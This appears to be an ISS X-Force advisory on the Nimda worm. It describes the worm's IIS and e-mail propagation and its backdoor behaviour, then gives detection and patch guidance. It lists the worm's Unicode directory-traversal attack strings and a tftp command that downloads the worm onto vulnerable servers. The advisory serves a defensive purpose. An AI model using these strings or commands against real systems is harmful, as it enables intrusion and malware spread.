ISS X-Force has captured a new Internet worm, known as Nimda, that contains much of
the functionality of Code Red worm
and itsderivatives. Nimda attempts to identify vulnerable Microsoft IIS
servers and deface them, and attempts to
infect additional systems. Nimda is
potentially more dangerous than Code Red or Code Blue, because it includes a powerful e-mail distribution
component. Code Red was limited to
infecting Web servers running IIS. Nimda, on the other hand, can infect any Windows system, and then distribute
further by emailing copies of itself to
individuals in MAPI (Messaging Application
Programming Interface) address books, or by identifying and
infecting vulnerable IIS servers. This
distinction means that there may be
millions of infections. Indications of severe network outages
related to the massive amount of network
traffic this worm generates have already
been reported.
Description:
Nimda is vastly different from Code Red in how it propagates. Nimda takes advantage of standard e-mail distribution
techniques to broaden the eligible pool of
target hosts. Instead of only attacking Web servers with Web server vulnerabilities, Nimda is
designed to propagate via spoofed e-mail.
The e-mail is spoofed to appear as if it came from trusted sources. Nimda relies on extensive
local propagation once a system is
infected. It replaces .dll, .eml, .nws files on all shared drives. It also appends itself to all .htm,
.html, and .asp files on the infected
system. This also allows the worm to spread to remote users when they access Web pages on infected
servers.
IIS Scanning and Propagation
Nimda will use several Unicode Web Folder Traversal vulnerability attack strings to probe for vulnerable IIS systems.
The attack strings used are as
follows:
/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..
/root.exe?/c+
(root.exe is the backdoor that Code Red II installed on infected servers)
Nimda appends "/winnt/system32/cmd.exe?/c+dir" to the end of each attack string and inspects output to determine if the
target system is vulnerable. If a
vulnerable IIS Web server is found, Nimda will append the following command to an attack string to
upload a copy of the worm to the
vulnerable server:
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
E-mail Propagation
Nimda will read the e-mail address books on the infected system. It will e-mail a copy of itself to each address in the
list. The Subject: lines of the e-mails
containing the worm will vary.
Backdoor Functionality
Once a computer is infected with Nimda, the worm takes steps to "backdoor" the infected system, by creating
accounts that could provide further access
to the system by remote attackers. Nimda will create a "guest" account if it doesn't already exist, or
activate it if it has been disabled. It
will also add the guest user to the "Guests" and "Administrators" groups.Nimda will also open
the "C:" share to the Internet, giving full access to the C: drive of the infected computer.
Attackers from anywhere on the Internet
may access this share with full read/write access, once this share is opened.
Recommendations:
ISS RealSecure detects the Nimda worm through the HTTP_IIS_URL_Decoding signature. This signature was included in
Network Sensor X-Press Update 3.1 and
Server Sensor 6.0.1. RealSecure Network Sensor also detects the Nimda worm with the HTTP_Windows_Executable
signature. ISS BlackICE products will the
trigger the "2000639 - HTTP UTF8 backtick"
and "2002595 - IIS system32 command" events. ISS Internet Scanner customers can test for
this vulnerability using the
IisUnicodeTranslation check, which was included in XPU 4.4 (and
later updated in XPU 4.8).
ISS System Scanner customers can test for this vulnerability using the MS00-078 check included in XPU 1.13 (#13). ISS X-Force recommends that all users contact
their anti-virus vendor for software
updates and Nimda removal information.
Microsoft IIS administrators who have not yet installed the patch for the Web Server Folder Traversal vulnerability
are encouraged to do so immediately.
For Microsoft IIS 4.0:
http://www.microsoft.com/ntserver/nts/downloads/critical/q269862
For Microsoft IIS 5.0:
http://www.microsoft.com/windows2000/downloads/critical/q269862
The Nimda worm takes advantage of well-known security weaknesses in IIS, as well as a general lack of security awareness
among Internet users regarding e-mail
attachments. ISS recommends that all IIS administrators apply all security patches immediately and
follow published Microsoft IIS Security
Checklists. Please refer to the links in the Additional Information section.
Additional Information:
ISS X-Force recommends that all Web site administrators review the appropriate IIS Security Checklist from
Microsoft, and verify that their IIS Web
servers have been configured securely. IIS servers that have been configured securely, using the Checklists,
are not vulnerable to many of the recent
and widely publicized remote IIS exploits.
The IIS Security Checklists are available at the following locations:
For Microsoft IIS 4.0:
http://www.microsoft.com/technet/itsolutions/security/tools/iischk.asp
For Microsoft IIS 5.0:
http://www.microsoft.com/technet/security/iis5chk.asp
Web site administrators are also strongly encouraged to apply the latest IIS cumulative security patch to prevent Web
servers from being compromised by this and
other IIS exploits. This patch is available from
the following Microsoft Security Bulletin:
http://www.microsoft.com/technet/security/bulletin/MS01-044.asp